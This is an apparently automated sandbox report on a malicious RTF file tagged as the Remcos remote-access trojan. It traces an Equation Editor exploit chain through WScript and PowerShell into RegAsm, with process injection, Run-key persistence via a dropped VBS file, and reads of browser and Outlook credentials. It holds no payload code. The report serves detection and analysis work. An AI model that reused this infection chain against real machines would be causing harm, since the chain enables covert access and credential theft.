Malware Analysis Report

2025-01-02 03:18

Sample ID 240330-kd5kpsce23
Target b5b2948d407676eab86b1152e7ce5ec4.rtf
SHA256 73c5b71d2923b11a8b262321c6229520c93115f82c78d742f041a650725d482f
Tags
remcos remotehost collection persistence rat spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

73c5b71d2923b11a8b262321c6229520c93115f82c78d742f041a650725d482f

Threat Level: Known bad

The file b5b2948d407676eab86b1152e7ce5ec4.rtf was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection persistence rat spyware stealer

Remcos

Nirsoft

NirSoft WebBrowserPassView

NirSoft MailPassView

Blocklisted process makes network request

Reads user/profile data of web browsers

Adds Run key to start application

Accesses Microsoft Outlook accounts

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Checks processor information in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Launches Equation Editor

Modifies Internet Explorer settings

Suspicious behavior: AddClipboardFormatListener

Suspicious behavior: MapViewOfSection

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-30 08:30

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-30 08:30

Reported

2024-03-30 08:32

Platform

win7-20240221-en

Max time kernel

149s

Max time network

133s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b5b2948d407676eab86b1152e7ce5ec4.rtf"

Signatures

Remcos

rat remcos

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\KRTF.vbs" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3032 wrote to memory of 2412 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 3032 wrote to memory of 2412 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 3032 wrote to memory of 2412 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 3032 wrote to memory of 2412 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Windows\SysWOW64\WScript.exe
PID 2412 wrote to memory of 564 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 564 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 564 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2412 wrote to memory of 564 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2752 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2296 wrote to memory of 632 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2296 wrote to memory of 632 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2296 wrote to memory of 632 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2296 wrote to memory of 632 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe
PID 2752 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 1044 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
PID 2752 wrote to memory of 1868 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
